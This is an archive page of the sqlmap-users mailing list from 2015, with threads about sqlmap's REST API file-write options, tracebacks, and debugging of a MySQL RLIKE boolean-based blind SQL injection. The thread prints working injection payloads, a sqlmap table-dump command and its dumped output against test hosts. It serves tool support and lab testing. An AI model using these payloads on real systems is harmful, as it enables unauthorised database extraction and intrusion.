and developed in partnership with Slashdot Media, is your hub for all >>>> > things parallel software development, from weekly thought leadership blogs to >>>> > news, videos, case studies, tutorials and more. Take a look and join the >>>> > conversation now. http://goparallel.sourceforge.net/ >>>> > _______________________________________________ >>>> > sqlmap-users mailing list >>>> > sql...@li... >>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Brandon P. <bpe...@gm...> - 2015-03-03 00:25:07
|
Can you set the proxy argument to go through burp suite to see exactly what sqlmap is sending when those options are set? Sent from a phone > On Mar 2, 2015, at 6:21 PM, Johnathon Doe <hoo...@gm...> wrote: > > I am working on PHP front-end to leverage the REST API to drive functionality, having some issues working in a few of the advanced features - mostly file write. I was wondering if anyone could verify the wFile & dFile config options when set will trigger a file write action. > > I have managed to get the osCmd option to successfully write a file to the target, but I can't seem to get the normal --file-write --file-dest options to work. The osCmd option generally takes me passing in the prompt answers via the answer configuration option. > > I assumed if i set the values for the wFile & dFile options it would trigger the file write, but nothing seems to be happening. I dump the list of options currently configured and shows both options set with proper paths (same ones that work when provided to osCmd via answers to prompt). The logs don't show any errors and it just seems to end right where I would expect it to try the file writing. Is there a third option that needs to be set that I am perhaps missing? Any help you guys can provide is greatly appreciated! > > Also note: when i put in a bad path (just to test), it does seem to trigger the error for finding local file (wFile) so its doing something with these variables, but still seems like I'm missing something.... > > Thanks, > HR > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for all > things parallel software development, from weekly thought leadership blogs to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Johnathon D. <hoo...@gm...> - 2015-03-03 00:21:54
|
I am working on PHP front-end to leverage the REST API to drive functionality, having some issues working in a few of the advanced features - mostly file write. I was wondering if anyone could verify the wFile & dFile config options when set will trigger a file write action. I have managed to get the osCmd option to successfully write a file to the target, but I can't seem to get the normal --file-write --file-dest options to work. The osCmd option generally takes me passing in the prompt answers via the answer configuration option. I assumed if i set the values for the wFile & dFile options it would trigger the file write, but nothing seems to be happening. I dump the list of options currently configured and shows both options set with proper paths (same ones that work when provided to osCmd via answers to prompt). The logs don't show any errors and it just seems to end right where I would expect it to try the file writing. Is there a third option that needs to be set that I am perhaps missing? Any help you guys can provide is greatly appreciated! Also note: when i put in a bad path (just to test), it does seem to trigger the error for finding local file (wFile) so its doing something with these variables, but still seems like I'm missing something.... Thanks, HR |
|
From: Miroslav S. <mir...@gm...> - 2015-02-26 14:44:31
|
Hi. Can you please contact me back privately with the details of the url? There is something strange going on here. In any case, not able to reproduce nor find what would be the cause of this behavior. Bye On Mon, Feb 23, 2015 at 4:51 AM, Nemo Slapz <n3m...@gm...> wrote: > [19:47:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your > run with the latest development version from the GitHub repository. If the > exception persists, please send by e-mail to ' > sql...@li...' or open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. The developers will > try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev > Python version: 2.7.3 > Operating system: posix > Command line: ./sqlmap -u ************************************** > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "./sqlmap", line 95, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 364, in start > if not checkConnection(suppressOutput=conf.forms) or not checkString() > or not checkRegexp(): > File "/usr/share/sqlmap/lib/controller/checks.py", line 1213, in > checkConnection > page, _ = Request.queryPage(content=True, noteResponseTime=False) > File "/usr/share/sqlmap/lib/request/connect.py", line 894, in queryPage > page, headers, code = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, > method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, > ignoreTimeout=timeBasedCompare) > File "/usr/share/sqlmap/lib/request/connect.py", line 386, in getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen > return _opener.open(url, data, timeout) > File "/usr/lib/python2.7/urllib2.py", line 401, in open > response = self._open(req, data) > File "/usr/lib/python2.7/urllib2.py", line 419, in _open > '_open', req) > File "/usr/lib/python2.7/urllib2.py", line 379, in _call_chain > result = func(*args) > File "/usr/lib/python2.7/urllib2.py", line 1211, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "/usr/lib/python2.7/urllib2.py", line 1178, in do_open > h.request(req.get_method(), req.get_selector(), req.data, headers) > File "/usr/lib/python2.7/httplib.py", line 962, in request > self._send_request(method, url, body, headers) > File "/usr/lib/python2.7/httplib.py", line 996, in _send_request > self.endheaders(body) > File "/usr/lib/python2.7/httplib.py", line 958, in endheaders > self._send_output(message_body) > File "/usr/lib/python2.7/httplib.py", line 818, in _send_output > self.send(msg) > File "/usr/lib/python2.7/httplib.py", line 780, in send > self.connect() > File "/usr/lib/python2.7/httplib.py", line 761, in connect > self.timeout, self.source_address) > File "/usr/lib/python2.7/socket.py", line 564, in create_connection > sock.connect(sa) > AttributeError: '_socketobject' object has no attribute 'connect' > > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, > sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for > all > things parallel software development, from weekly thought leadership blogs > to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2015-02-26 14:33:36
|
Looks like false positive. Please rerun with --flush-session. Bye On Sun, Feb 22, 2015 at 6:41 AM, Bruno Ferreira <ch...@ch...> wrote: > Hello everyone, > > I just started using sqlmap and it detects basic stuff fine so far > (database, operative system, php version, ...) but when it comes to > retrieving information I get a lot of garbage that I can't make sense of. > An example of this 'garbage text' can be seen in the attached screenshot. > > For those wondering, this is for a security challenge (that is one of many > things that happened as part of the computer science week in the > university) and my final goal is to be able to list files in the server > (and if they are out of the www folder, I should still be able to read them > somehow). > > But my question is about all those strange characters that can be seen in > the attached picture and how to convert them to something useful. > > Thank you, > Bruno Ferreira > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, > sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for > all > things parallel software development, from weekly thought leadership blogs > to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Nemo S. <n3m...@gm...> - 2015-02-23 03:51:37
|
[19:47:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to ' sql...@li...' or open a new issue at ' https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev Python version: 2.7.3 Operating system: posix Command line: ./sqlmap -u ************************************** Technique: None Back-end DBMS: None (identified) Traceback (most recent call last): File "./sqlmap", line 95, in main start() File "/usr/share/sqlmap/lib/controller/controller.py", line 364, in start if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): File "/usr/share/sqlmap/lib/controller/checks.py", line 1213, in checkConnection page, _ = Request.queryPage(content=True, noteResponseTime=False) File "/usr/share/sqlmap/lib/request/connect.py", line 894, in queryPage page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) File "/usr/share/sqlmap/lib/request/connect.py", line 386, in getPage conn = urllib2.urlopen(req) File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen return _opener.open(url, data, timeout) File "/usr/lib/python2.7/urllib2.py", line 401, in open response = self._open(req, data) File "/usr/lib/python2.7/urllib2.py", line 419, in _open '_open', req) File "/usr/lib/python2.7/urllib2.py", line 379, in _call_chain result = func(*args) File "/usr/lib/python2.7/urllib2.py", line 1211, in http_open return self.do_open(httplib.HTTPConnection, req) File "/usr/lib/python2.7/urllib2.py", line 1178, in do_open h.request(req.get_method(), req.get_selector(), req.data, headers) File "/usr/lib/python2.7/httplib.py", line 962, in request self._send_request(method, url, body, headers) File "/usr/lib/python2.7/httplib.py", line 996, in _send_request self.endheaders(body) File "/usr/lib/python2.7/httplib.py", line 958, in endheaders self._send_output(message_body) File "/usr/lib/python2.7/httplib.py", line 818, in _send_output self.send(msg) File "/usr/lib/python2.7/httplib.py", line 780, in send self.connect() File "/usr/lib/python2.7/httplib.py", line 761, in connect self.timeout, self.source_address) File "/usr/lib/python2.7/socket.py", line 564, in create_connection sock.connect(sa) AttributeError: '_socketobject' object has no attribute 'connect' |
|
From: Bruno F. <ch...@ch...> - 2015-02-22 19:06:17
|
Hello again, I found the problem. The SQL injection parameter that I found was a false positive and the output of the page was random and unrelated to the injected values. The 'garbage' I got was the product of that randomness. Cumprimentos, Bruno Ferreira 2015-02-22 14:40 GMT+00:00 Bruno Ferreira <ch...@ch...>: > Hello everyone, > > I just started using sqlmap and it detects basic stuff fine so far > (database, operative system, php version, ...) but when it comes to > retrieving information I get a lot of garbage that I can't make sense of. > An example of this 'garbage text' can be seen in the attached screenshot. > > For those wondering, this is for a security challenge (that is one of many > things that happened as part of the computer science week in the > university) and my final goal is to be able to list files in the server > (and if they are out of the www folder, I should still be able to read them > somehow). > > But my question is about all those strange characters that can be seen in > the attached picture and how to convert them to something useful. > > Thank you. > > Bruno Ferreira > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-22 15:14:26
|
BTW I hope this doesn’t come across as it being a problem with sqlmap, I think it is a problem with the local system’s mysql instance, just trying to figure out why an RLIKE injection would allow enumeration of DATABASE() but not from the users table. I figured I would ask this list if anyone else had experienced similar, though.
‘admin’ is the only user in the database, so I know it is the only row that could be returned, but order by presents the same results…
mysql> select ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1));
+----------------------------------------------------------------+
| ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) |
+----------------------------------------------------------------+
| 97 |
+----------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)
Might just need to say it is some quirk on the exploitable system’s MySQL instance… It’s a little bizarre.
mysql Ver 14.14 Distrib 5.6.19, for Linux (x86_64) using EditLine wrapper
> On Feb 22, 2015, at 7:31 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi again.
>
> I believe that we have a problem here. I am trying to reproduce your "problem" and can't do it:
>
> mysql> select * from users;
> +----+--------+----------------------------------+
> | id | name | surname |
> +----+--------+----------------------------------+
> | 1 | admin | blissett |
> | 2 | fluffy | bunny |
> | 3 | wu | ming |
> | 4 | NULL | nameisnull |
> | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 |
> +----+--------+----------------------------------+
> 5 rows in set (0.00 sec)
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> Empty set (0.00 sec)
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
> mysql>
>
> I believe that you have a problem with order of returned results. You can't expect query results to be returned in deterministic way. That's just how the DBMS works.
>
> Also, that's why we use ORDER BY wherever we can, to skip this kind of problems. If you take a look into -v 3 of your run in sqlmap you'll see that it uses "ORDER BY", while you don't use in your case:
>
> [14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT 0,1),6,1))>2) THEN 1 ELSE 0 x28 END))
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote:
> "I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1 <http://192.168.223.129/sqlmap/mysql/get_int.php?id=1>" --batch --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s) reque
> sts:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause
> Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name | surname |
> +----+--------+-----------------------------------------+
> | 1 | luther | blissett |
> | 2 | fluffy | bunny |
> | 3 | wu | ming |
> | 4 | NULL | nameisnull |
> | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote:
> Right, in the sql statement where I select 'a', the ord of this is not greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be functionally equivalent to select 'a' as mid is used to select the first character of the first username which is 'admin' as shown, but this statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table, and I logged into the server as root to try to figure out what the issue might be and this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote:
>
>> Hi.
>>
>> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.
>>
>> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False its called with errorneous regexp 0x28 ('parentheses not balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm... <mailto:bpe...@gm...>> wrote:
>> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk <http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li... <mailto:sql...@li...>
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users>
>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm <http://about.me/stamparm>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm <http://about.me/stamparm>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm <http://about.me/stamparm>
|
|
From: Bruno F. <ch...@ch...> - 2015-02-22 14:40:59
|
Hello everyone, I just started using sqlmap and it detects basic stuff fine so far (database, operative system, php version, ...) but when it comes to retrieving information I get a lot of garbage that I can't make sense of. An example of this 'garbage text' can be seen in the attached screenshot. For those wondering, this is for a security challenge (that is one of many things that happened as part of the computer science week in the university) and my final goal is to be able to list files in the server (and if they are out of the www folder, I should still be able to read them somehow). But my question is about all those strange characters that can be seen in the attached picture and how to convert them to something useful. Thank you. Bruno Ferreira |
|
From: Miroslav S. <mir...@gm...> - 2015-02-22 13:31:37
|
Hi again.
I believe that we have a problem here. I am trying to reproduce your
"problem" and can't do it:
mysql> select * from users;
+----+--------+----------------------------------+
| id | name | surname |
+----+--------+----------------------------------+
| 1 | admin | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
| 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 |
+----+--------+----------------------------------+
5 rows in set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> SELECT `name` from users LIMIT 0,1;
+-------+
| name |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
mysql>
I believe that you have a problem with order of returned results. You can't
expect query results to be returned in deterministic way. That's just how
the DBMS works.
Also, that's why we use ORDER BY wherever we can, to skip this kind of
problems. If you take a look into -v 3 of your run in sqlmap you'll see
that it uses "ORDER BY", while you don't use in your case:
[14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT
IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT
0,1),6,1))>2) THEN 1 ELSE 0 x28 END))
Kind regards,
Miroslav Stampar
On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <
mir...@gm...> wrote:
> "I only bring it up because sql map has no problem grabbing the database
> with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "
> http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch
> --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> reque
> sts:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
> GROUP BY
> clause
> Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28
> END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name | surname |
> +----+--------+-----------------------------------------+
> | 1 | luther | blissett |
> | 2 | fluffy | bunny |
> | 3 | wu | ming |
> | 4 | NULL | nameisnull |
> | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...
> > wrote:
>
>> Right, in the sql statement where I select 'a', the ord of this is not
>> greater than 112, and it fails as expected with parens not balanced.
>>
>> The query below this that selects the first name from users should be
>> functionally equivalent to select 'a' as mid is used to select the first
>> character of the first username which is 'admin' as shown, but this
>> statement does not fail as expected.
>>
>> I am at a loss as to why the latter does not fail when the inner select
>> is functionally equivalent to select 'a', and the former fails as expected.
>>
>> I only bring it up because sql map has no problem grabbing the database
>> with rlike but can't enumerate the values from the user table, and I logged
>> into the server as root to try to figure out what the issue might be and
>> this seems to be the root cause.
>>
>> Sent from a phone
>>
>> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...>
>> wrote:
>>
>> Hi.
>>
>> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function
>> here (in your case) is to PROVOKE errors on False, and that's exactly
>> what's going on here.
>>
>> In case of True, RLIKE is called with perfectly valid 0x7474747474, while
>> in case of False its called with errorneous regexp 0x28 ('parentheses not
>> balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...
>> > wrote:
>>
>>> Have an injection that I can use RLIKE to induce a 500 error, but it
>>> only works in some circumstances. Enumerating the DATABASE() value works,
>>> as well as the current user, but enumerating values from the database
>>> tables fails. Even as root on the box, the RLIKE query fails to throw an
>>> exception when attempting to use RLIKE in some instances.
>>>
>>> As you can see in the output below, the user can select the first name
>>> value from the users table (which is ‘admin’). When using RLIKE to test the
>>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>>> not balanced exception as expected. You also get this exception when simply
>>> selecting ‘a’.
>>>
>>> But when you select the first row from the users table and grab the
>>> first character (an ‘a’), no exception is thrown and an empty result set is
>>> returned.
>>>
>>> Any thoughts?
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>>> 0x7474747474 ELSE 0x28 END));
>>> Empty set (0.01 sec)
>>>
>>> mysql> SELECT `name` from users LIMIT 0,1;
>>> +-------+
>>> | name |
>>> +-------+
>>> | admin |
>>> +-------+
>>> 1 row in set (0.00 sec)
>>>
>>> mysql>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Miroslav S. <mir...@gm...> - 2015-02-22 13:16:12
|
"I only bring it up because sql map has no problem grabbing the database
with rlike but can't enumerate the values from the user table"
$ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1"
--batch --test-filter="RLIKE" --dump -D testdb -T users
...
sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
sts:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY
clause
Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28
END))
---
...
[14:14:52] [INFO] postprocessing table dump
Database: testdb
Table: users
[5 entries]
+----+--------+-----------------------------------------+
| id | name | surname |
+----+--------+-----------------------------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
| 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 (test) |
+----+--------+-----------------------------------------+
On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...>
wrote:
> Right, in the sql statement where I select 'a', the ord of this is not
> greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be
> functionally equivalent to select 'a' as mid is used to select the first
> character of the first username which is 'admin' as shown, but this
> statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is
> functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sql map has no problem grabbing the database
> with rlike but can't enumerate the values from the user table, and I logged
> into the server as root to try to figure out what the issue might be and
> this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...>
> wrote:
>
> Hi.
>
> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function
> here (in your case) is to PROVOKE errors on False, and that's exactly
> what's going on here.
>
> In case of True, RLIKE is called with perfectly valid 0x7474747474, while
> in case of False its called with errorneous regexp 0x28 ('parentheses not
> balanced').
>
> Bye
>
> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> Have an injection that I can use RLIKE to induce a 500 error, but it only
>> works in some circumstances. Enumerating the DATABASE() value works, as
>> well as the current user, but enumerating values from the database tables
>> fails. Even as root on the box, the RLIKE query fails to throw an exception
>> when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name
>> value from the users table (which is ‘admin’). When using RLIKE to test the
>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>> not balanced exception as expected. You also get this exception when simply
>> selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first
>> character (an ‘a’), no exception is thrown and an empty result set is
>> returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>> 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
48 messages has been excluded from this view by a project administrator.
